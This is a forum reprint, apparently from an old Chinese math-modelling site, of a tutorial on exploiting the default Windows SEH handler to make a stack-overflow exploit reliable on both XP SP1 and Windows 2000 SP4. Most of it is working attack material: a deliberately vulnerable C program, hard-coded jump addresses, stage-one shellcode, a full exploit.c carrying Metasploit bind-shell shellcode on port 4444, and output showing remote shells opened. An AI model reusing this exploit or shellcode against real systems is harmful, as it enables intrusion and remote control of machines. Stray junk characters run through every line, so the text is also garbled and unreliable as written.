数学建模社区-数学中国

标题: Exploiting Default Exception Handler to Increase Exploit Sta [打印本页]
作者: 韩冰    时间: 2004-11-19 10:39
标题: Exploiting Default Exception Handler to Increase Exploit Sta
The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.) r( \/ i' k, S  \
2 E0 \* f; V2 l# i8 h: R# v. D
[Buf] <- Shellcode
2 y4 |' c( z: V9 d- L6 v[Return Address] <- jmp register (for Windows XP sp1)+ m& ]1 |9 W, M# K& n/ N
[Various Stack Data] <- Junk+ @+ c' d3 z. o5 d/ ]: E
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward4 ?# V$ Z. Z+ W' l
[SE Handler] <- jmp register (for Win2k sp4)* z* R3 \3 Y7 X& l: [
[Stage1 Shellcode] <- stage1 shellcode for win2k9 ^# J9 Q1 p, i. V0 [

3 w6 ?" r. J1 w0 t7 bIf the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses
6 P; c; d. r6 o$ O) |6 s5 U& \7 `( Z( T5 t& Q
Necessary Tools:$ [- q! S! W  |( s  Q; u
- OllyDBG
$ Y0 t: W8 u  y# N- C/C++ Compiler+ H  F9 ]6 h3 M
- nasm
& {5 i$ L/ S- j$ c7 ]) N7 l/ ]: s1 u- Sac
, I, H' G6 X) P' N8 z0 _. w* x/ D2 T
+ U1 U3 V4 d1 ~. f# R2 J( W" P5 i2 KVulnerable Code:
- n2 z# C% n/ Z  @//lamebuf.c+ L+ X+ H7 N; s
#include<stdio.h>
& v8 @4 E, g7 y5 F/ E% \$ J#include<string.h>
$ M0 l* k0 W* y) B! g#include<windows.h># N2 x( _5 [1 c: Q& e* y' F
int main(int argc,char *argv[]){+ o7 ^9 U+ f& K9 `

  h& ]& N" M( W3 ^' w, ]1 d* J) Dchar buf[512];
! r( x5 L) l/ m9 ?' G; ?1 Pchar buf1[1024]; // <- simulate a stack
8 ^' @$ e5 U/ X+ Y8 D$ z//DebugBreak();
- Q' z* H/ F6 Wif (argc != 2){ return -1; }
) N. z; \" A  R0 Z; r0 G" D6 F% o& y" D6 d4 g
strcpy(buf,argv[1]);
+ c: S  F9 x6 R# P; Ureturn 0x0;% y) W+ k* I% w5 q4 Y3 n
}/ K# }( E; J) t; y/ _
1 @0 `% r7 R  d$ z( F
Getting Started:
0 M, {1 B5 m: y8 NBefore writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:& X0 e  [5 H5 h7 Y* _  \3 J
, ^, l1 l, S" w4 @; M$ L' ~
EAX 00000000' S$ y, [: j. |' G( \$ R
ECX 00321404
/ \, v% |( ~9 q3 b  tEDX 004141416 m1 q# `+ e, l* L) w& {
EBX 7FFDF000
2 q7 q8 z: a8 c4 Y, JESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
4 K& p- ?! X( n& XEBP 41414141
& a! B# {( w; M0 T+ Y2 @/ oESI 77D4595F' Y  f( k5 q; _
EDI 77F59037 ntdll.77F59037
7 ~! t5 E  s. C) O1 U0 L' nEIP 41414141
+ c5 `: P! s% Z3 Y
- g! Q2 O; w5 g8 ~* W) g; uLets take a look at the stack and see what happened to the default exception handler:/ _8 o( j5 f- S2 k. o
0x0012FFB0 41414141 Pointer to next SEH Record" W9 {. i% Z# `. T  N
0x0012FFB4 41414141 SE Handler# N0 G: ?! U1 l) V

+ b! Y4 R; n! n6 w4 mWe successfully overwrote the return address and the default exception handler.
& ?! R# d! |2 }0 v4 R$ q9 J, X( {
3 w0 s; W8 c& W) {5 LPrimary Return Address (Windows XP SP1 EN):+ O' ~$ \5 h* r* n
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:5 }; F& C! P' t; g+ X
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"
/ ]4 A  P' b/ ?% N  C
# H+ g( J. }  |7 U' c, ~! m$ J5 mSecondary Return Address (Windows 2000 SP4 EN):1 A9 H$ e  N( y  _0 `
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:# `8 f, I; p+ n. }$ D
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
8 c1 E! }8 x' Z6 @, T1 b3 h+ Y, R; F1 f; ~0 I9 @7 y5 ^
Proof Of Concept:. j3 ~; d) b: w5 d; A6 S+ {
// exploit.c
+ c! I, Q4 O0 \% J6 U, T& Q// Tal zeltzer - [Double Return] //7 p) X$ k$ W; G: f$ g

6 o4 z: o6 Y' K, \# ^' _#include<stdio.h>
# o- x, M$ c9 S" s- @#include<string.h>3 t! [/ V$ O! ?" h3 k
#include<windows.h>. v8 U$ Z, e, W: s# Z2 [6 ~$ n8 n
9 C; i) G, `0 o& t! r3 C$ P+ Q
#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp; v* m# |- x' h
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx
' s! W4 I% y  w$ V5 X0 e
) ^8 X* u' X" `4 y( ?// Stage1 For WinXP Sp1 English. i, H( m0 x7 b% e
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";$ e. E+ v% G8 y" V
5 Z& T" V  W& X
// Stage1 For Win2k Sp4 English6 d% k# b$ ]- J# v
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";
9 x8 a, ~% B2 J* Z# Q
7 x9 T. [$ O/ j# |+ x. G// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com; p* t& ]! d2 [3 J. B
unsigned char shellcode[] =+ a; I( V. j- U
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
9 y/ C4 K' h" v/ U1 U"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19", {0 c' ?  Z( O/ S  z
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"& u$ A) w) ?: T- [  L9 `. @
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"2 z8 c  k; c$ ?% I
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
5 {; j) [! ?9 c0 Z! \"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
4 j5 H3 `) U: C: Q"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
" U0 P. w) ]' L+ w0 }"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
1 n/ y3 b( m" m; w  {# v$ w"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
3 Q. I( P6 x. {% |) w6 H, W"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
2 J" h( t$ y( A* a/ [+ M"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
7 [0 G% g- P* U+ Y' h, V"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"# M" y# g& t  a9 f3 \
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"- C: C4 G/ V+ D9 @8 m
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
3 a; u& @# G+ s" b  `" j"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"9 |! G$ |2 _! \& e( K7 A
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
3 R" c8 g6 v. s' N; W% }"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
6 t( N% h, H- d8 {" C"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
8 y) X' z+ T5 [' v8 `"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"2 Y# U0 I" b# h5 D  ^' t
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
% _* }/ ^  F+ t2 K- I4 H, `8 z"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"6 C3 f8 e7 M' V) R* V* g! ^+ W
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
8 T6 C7 r2 G" x3 V"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
  n% k4 _0 q; u' Z. `"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"+ H- u) m5 ]2 h$ T# p9 Y/ h: Z
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";4 L/ K  Y; T+ M7 T9 H. j* E* O

5 \7 H+ Y. Q* `# A/ q: O; M6 P# c# i+ [: Y3 F+ ~
int main(int argc,char *argv[]){
' r8 M  k7 \4 L) u4 s' i4 v
0 q' ]& B9 n+ X' ^2 c/ c+ uchar *bufExe[3];
: Q1 Y9 `6 i' Q' B5 h3 t! hchar buf[2048];
# H: _' C. n9 {) \7 L5 obufExe[0] = "lamebuf.exe";! d0 k8 L4 S8 x/ U! j% ]2 m
bufExe[2] = NULL;% }9 K4 c' f5 j/ [. _+ F% p; f

  _- Z1 u3 e0 H* smemset(buf,0x0,sizeof(buf));
5 N0 M) {7 y* H0 i2 D3 L8 smemset(buf,0x90,1652);
; s0 \0 E% K/ R0 Xmemcpy(&buf[24],shellcode,sizeof(shellcode)-1);7 l  C2 p; }4 D: A9 \
$ Y% B/ f4 a. o7 W; }8 {/ T3 A% {
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode5 g# a6 h" |& B9 o
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode  D6 @4 @3 |* d+ r% N, ]! N

4 R2 z$ N/ M3 @) m0 Y# R" j*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
2 o% F6 r1 k8 I  ]- X/ ~*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code" r4 i: J4 s/ U$ a2 t3 m
*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en1 y! q& {% \7 K6 M0 L

+ Z1 b# P# c  ]3 B$ J9 l& C
0 H* o; O* Y( \& s/ a8 ?& a' A! JbufExe[1] = buf;; A5 \, C( _+ N4 L+ y  j9 b$ b
//Execute the vulnerable application
, T9 v1 \( N2 p0 C8 rexecve(bufExe[0],bufExe,NULL);
8 M; G7 ^! Q: @9 ]8 M+ c" b/ j2 G% Q  {
return 0x0;; N0 K% t* i& G( ?6 _9 P- m
}
0 l/ W7 ]/ M+ b9 D$ t% W
9 [2 b+ h+ I  X1 h  MExploit under Windows XP SP1:# @( ?" j; \- E& y2 H
C:\>exploit
( V- T. i- X- A1 pC:\>
6 O6 L9 O6 B% \% U( K7 I& QC:\>telnet 127.0.0.1 4444' Z% n+ ^5 p5 A
. |. J7 O. U) X0 N% L) }2 g
Microsoft Windows XP [Version 5.1.2600]3 [9 j  |/ P& ?/ P1 w
(C) Copyright 1985-2001 Microsoft Corp.( l9 ]  `/ Y$ j7 r+ _

! B+ ?' o+ e& [" rC:\>
. d+ w4 }9 q, h' s' r
! p; Q5 K7 F& ]( {Exploit under Windows 2000 SP4:, ?/ ^" V/ w- \, M
C:\>exploit, }4 l9 B3 f6 G4 {
C:\>
" J$ n9 P6 L: N$ }/ P3 F3 KC:\>telnet 127.0.0.1 4444
# P9 Q2 ^0 e% h1 }+ O, d" l
0 |5 v' r7 g, xMicrosoft Windows 2000 [Version 5.00.2195]
+ z* S  N- U1 z  S4 ~(C) Copyright 1985-2000 Microsoft Corp.



欢迎光临 数学建模社区-数学中国 (http://www.madio.net/) Powered by Discuz! X2.5